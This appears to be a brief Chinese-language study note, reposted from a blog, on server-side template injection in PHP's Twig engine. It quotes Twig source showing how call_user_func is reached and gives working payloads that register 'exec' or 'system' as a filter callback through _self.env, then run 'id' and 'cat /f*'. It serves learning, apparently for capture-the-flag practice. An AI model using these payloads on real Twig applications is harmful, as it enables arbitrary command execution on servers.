本文共 771 字，大约阅读时间需要 2 分钟。

• Twig SSTI模板注入
• 和前面做的jinja2有点不同，学习一下
• 重点内容
• 在getFilter()方法中的874行上有对危险函数call_user_func的调用。如果我们能够控制这个参数，就可以用它来调用任意的PHP函数。

public function getFilter($name){
           [snip]        foreach ($this->filterCallbacks as $callback) {
           if (false !== $filter = call_user_func($callback, $name)) {
               return $filter;        }    }    return false;}public function registerUndefinedFilterCallback($callable){
       $this->filterCallbacks[] = $callable;}

• 所以，执行任意的shell命令只是将exec作为过滤器回调，然后在调用getFilter即可。

{
   {
   _self.env.registerUndefinedFilterCallback("exec")}}{
   {
   _self.env.getFilter("id")}}uid=1000(k) gid=1000(k) groups=1000(k),10(wheel)

• payload:

{
   {
   _self.env.registerUndefinedFilterCallback("system")}}{
   {
   _self.env.getFilter("cat /f*")}}

转载地址：http://efwmf.baihongyu.com/